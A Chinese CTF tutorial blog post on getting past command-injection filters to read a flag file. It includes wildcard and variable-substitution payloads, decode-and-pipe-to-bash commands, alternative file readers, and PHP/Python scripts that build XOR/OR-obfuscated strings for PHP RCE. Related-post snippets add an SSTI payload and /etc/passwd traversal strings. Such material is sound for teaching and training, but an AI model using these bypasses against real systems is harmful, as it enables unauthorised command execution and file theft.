CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧

已于 2024-05-06 21:43:36 修改
阅读量1.4k 收藏 16
点赞数 16
文章标签: 安全 web安全 ctf
于 2024-05-06 21:40:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79688134/article/details/138506115
版权
本文讲述了在IT安全挑战中,如何在文件名过滤和字符限制条件下,利用通配符、正则表达式、特殊字符替换、编码(如Base64、Hex和Oct)以及异或操作等技巧,绕过限制成功读取flag文件的方法。
摘要由CSDN通过智能技术生成

 在我遇到的题目中,想要读取文件必然是要执行cat /flag这个命令,但是题目当然不会这么轻松。让你直接cat出来,必然会有各种各样的滤过条件,你要做的就是尝试各种方法在cat /flag的基础上进行各种操作构建出最终的payload。

下面我就总结一下一些比较常见的过滤的条件和绕过方式。

(其实过滤条件主要都是对字符的限制,再有就是对长度的限制。)

一.文件名被过滤

我按自己的想法分为两大类

关键词过滤

当过滤不是逐个字母比对时(也就是关键词过滤),我们依然可以使用cat这个命令来操作,因此我们主要是操作“flag”这个字符串,使其不用不用这四个字符也能表示flag这个文件。

因此我们就逐个尝试这几种绕过方法。

1.* 通配文件,在linux里f*可以指代任何以f开头的文件 f*就可以表示flag文件因此我们构建出的payload是 cat /f*,

2.?匹配文件名:可以用?代替滤过字符 f???,就代表任意一个f开头四个字符的文件,自然也可以代表flag,因此

payload是 cat /f???

3.正则匹配: 其实与上述类似,用一个范围代表字符 [9-q]可以匹配早ascll码在9到q之间的字符。

payload是 cat /[9-q][9-q][9-q][9-q]

4.分割文件名,在linux里在字母中间插上‘ “ \这样的字符不会影响,因此可以在其中插入构建payload

其实如果只是关键词过滤的话还挺好绕过的。当然关键词绕过方法,和下面逐个字母比对的绕过有一些方法是重合的,但明显如果只是简单的关键词绕过没有必要搞一些编码什么的。

字符过滤

这个就比较苛刻了,因为题目限制的任何字符都不能出现,比如一般将flag字符进行过滤的也直接把cat给ban了因为cat同样也含有a字符

小ban

ban的字符比较少,凑吧凑吧能构建出payload

1.  / 被过滤:在linux中echo ${PATH}可以输出文件路径在而${PATH:0:1}便取到了/字符,

因此echo ${PATH:0:1}便是代表 /,当然还有很多写法代表/,比如${PATH:4:1}.${PWD:0:1}.${SHELL:0:1}等可以酌情选择

2.空格被过滤同样也可以找代表字符的变量 比如$IFS ${IFS} 或者这样表示{cat,/flag}也可以,我还遇到过一个方法就是使用< 可以这样cat</flag,在前边加<<<也可以表示输入流

3.若是cat的一些字符被ban也可以选择换几个读取命令,下面介绍几个命令

cat(用于连接文件并打印到标准输出设备上)

tac (用于将文件以行为单位反序输出)

more(类似cat命令,会一页一页的显示)我在实战中用到过

less(作用与more类似,都用来浏览文本文件中的内容)

head(可用于查看文件开头部分的内容,后边可选择加以个 -n参数表示显示几行,默认显示10行)

tail(与head类似,但它默认显示后10行)

nl (可以为输出列加上编号)

sed 可以这样构造 sed p /f*

sort(用于将文本文件内容加以排序)

uniq(删除文件中的连续重复行 如果你在不使用任何参数的情况下使用 uniq 命令,它将删除所有连续的重复行,只显示唯一的行)

rev (反转一个或多个文件的行)会把flag倒叙输出

od (od(Octal Dump)命令用于将指定文件内容以八进制、十进制、十六进制、浮点格式或 ASCII 编码字符方式显示,系统默认的显示方式是八进制。)

vim (这俩都是Linux里的文件编辑器,我们在网页直接用system("vim /f*");虽然不会进入编辑模式但还是可以看到里面的内容。)

man(man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息,类似于vim/vi,直接对文本运行可以看到文本内容。)

paste (使用paste命令可以将每个指定文件里的每一行整合到对应一行里写到标准输出,之间用制表符分隔。)

grep(查找文件里符合条件的字符串)可以这样构造 grep { /f*

file (查看文件信息或类型) file -f /f*

dd (用于读取、转换并输出数据。) 后要加 if=/flag(有点鸡肋,因为f一般会被ban)

大ban

被ban的字符很多,或者只能用几个特定的字符,上述的一些方法就构造不出payload了,这时就要用到较为麻烦的方法了,那就是编码。下面着重介绍几个并附上脚本。(找到合适的编码方式后,还要考虑该方式能不能被识别出来,构造不对就可能被认为是字符串而已)

1.base64编码 echo ’编码后的‘ |base64 -d | bash

2.hex编码 echo ”    “ |xxd -r -p |bash

补充知识:管道符 | 会将前一个命令执行的结果当作第二个命令的输入。

xxd命令:它能将一个给定文件或标准输入转换为十六进制形式,也能将十六进制转换回二进制形式,用法是:xxd /f*

3.oct编码 当你看到白名单中有数字,$  \  ' ' 基本可以确定要用这种编码方式$' ',单引号里加入编码后的内容,空格一般不能被识别,所以可以在空格处断开 $' '<$' '这样就可以了。

下面附上脚本4.异或 同或()

在 PHP 中两个字符串异或之后,得到的还是一个字符串。如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行异或,从而得到我们想要的字符串。

或与其原理相同。

下面附上两个脚本

异或

<?php
$myfile = fopen("xor_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {
    for ($j=0; $j <256 ; $j++) {

    if($i<16){
        $hex_i='0'.dechex($i);
    }
    else{
        $hex_i=dechex($i);
    }
    if($j<16){
        $hex_j='0'.dechex($j);
    }
    else{
        $hex_j=dechex($j);
    }
    $preg = '/[flag$\/*?;]/';   // 根据题目给的正则表达式修改即可
    if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
        echo "";
    }
    else{
            $a='%'.$hex_i;
            $b='%'.$hex_j;
            $c=(urldecode($a)^urldecode($b));
            if (ord($c)>=32&&ord($c)<=126) {
                $contents=$contents.$c." ".$a." ".$b."\n";
            }
        }

    }
}
fwrite($myfile,$contents);
fclose($myfile);

注意根据题目过滤要求修改一下正则

执行后会生成一个txt文件,将其粘贴至下一个python脚本文件夹下

# -*- coding: utf-8 -*-

def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("xor_rce.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"^\""+s2+"\")"
    return(output)

while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
    print(param)

运行python,在控制板输入你要编码的内容。

或的方式相同,不做赘述,附上php与python脚本

<?php


$myfile = fopen("or_rce.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {

        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
        $preg = '/[flag$\/*?;]/';    // 根据题目给的正则表达式修改即可
        if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) {
            echo "";
        } else {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) | urldecode($b));
            if (ord($c) >= 32 & ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }

    }
}
fwrite($myfile, $contents);
fclose($myfile);

# -*- coding: utf-8 -*-

def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("or_rce.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")"
    return(output)

while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
    print(param)

akagty
关注
  • 16
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
ctf web解题 找flag夺旗赛
05-19
在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,尤其在Web安全领域备受关注。CTF Web解题比赛通常涉及到各种Web安全技术,包括但不限于SQL注入、XSS跨站脚本、文件包含漏洞、命令注入、CSRF跨站...
《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
ZhShy
01-12 4804
文章目录1.3.1 文件读取漏洞常见触发点1.3.1.1 web语言1. PHP2.python3.Java4.Ruby5.Node1.3.1.2 间件、服务件相关1.Nginx错误配置2.数据库3.软链接4.FFmpeg5.Docker-API1.3.1.3 客户端相关1.浏览器/Flash XSS2.MarkDown语法解析器XSS1.3.2 文件读取漏洞常见读取路径1.3.2.1 Linux1.flag名称(相对路径)2.服务器信息(绝对路径)1.3.2.2 Windows 1.3.1 文件读取漏洞
文件读取漏洞绕过
qq_82303224_的博客
04-24 630
urlPath=file:///etc/passwd //突破限制目录。file=C://wwwroot/web/web.config // 网站物理路径、url=file:///etc/passwd#a.txt。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file=../web.config. //加点。
ctf-文件包含-读取文件
wcwdnmdnmd的博客
06-03 3163
ctf-文件包含-读取文件打开网页看到源码几种方法 打开网页看到源码 可知有文件包含漏洞,以前已经学过 同时可get名为hello的变量 因为var_dump()的功能是输出变量的信息 所以如果变量为函数就会执行函数 可以看到flag.php 据此有如下方法查看flag.php: 几种方法 使用system()函数执行命令 cat flag.php 但当我们执行时发现输出了 **"?>"**猜测可能由于正着读eval()函数解析了php页面可以使用 tac命令倒着读,即: tac flag
2021-07-09 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(liunx)
热门推荐
时光隧道
07-09 5万+
一:文件读取漏洞常见触发点 1.Web语言 不同的Web语言,其文件读取漏洞的触发点也会存在差异,本小节以读取不同Web文件漏洞为例进行介绍,具体的漏洞场景请读者自行查阅,在此不再赘述。 1.1 PHP PHP标准函数有关文件读的部分不再详细介绍,这些函数包括但可能不限于:file_get_contents()、file()、fopen()函数(及其文件指针操作函数fread()、fgets()等),与文件包含相关的函数(include()、require()、include_once()、require
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2219
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url有个name=article,这个参数,猜测这个参数是突破点,将article.
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
可能与文件包含漏洞有关,参赛者需要了解如何利用文件路径控制或者远程文件包含来读取服务器上的特定文件,通常包括flag信息。 3. **bugku-ctf 第三题:速度要快** 这个题目可能测试的是XSS(跨站脚本攻击)或...
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛Web安全相关知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
002-CTF web题理论基础篇-第二课理论基础.pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其Web题目主要涉及Web安全领域的知识技巧。本篇将深入探讨CTF Web题型的基础理论,帮助参赛者理解和掌握解题的关键点。 1. 工具集: 在CTF Web挑战,通常会...
文件包含漏洞及绕过方法(以php为例)
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
CTFer成长之路之任意文件读取漏洞
自强不息
02-21 1249
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF 一些漏洞模式
qq_41996851的博客
05-10 848
SSTI模板注入 SSTI初探 SSTI 常用payload; {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
任意文件读取/下载漏洞
最新发布
qq_68163788的博客
05-23 2445
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
#ctf解题姿势#一些绕过方法
vircorns的博客
08-12 2371
绕过WAF的方法 大小写混合 小写或大写的关键字匹配技术,正则表达式/express/i 大小写敏感即无法绕过 替换关键字 大小写转化无法绕过,而且正则表达式会替换或删除select、union这些关键字,如果只匹配一次就很容易绕过 举例:?id=-15 UNIunionON SELselectECT 1,2,3,4 使用编码 URL编码 ,存在一种情况URL编码只进行了一次过滤,可以用...
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 5113
scandir() :将返回当前目录的所有文件和目录的列表。返回的结果是一个数组,其包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径的目录部分。
CTF命令执行常见绕过
qq_42383069的博客
04-18 5190
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值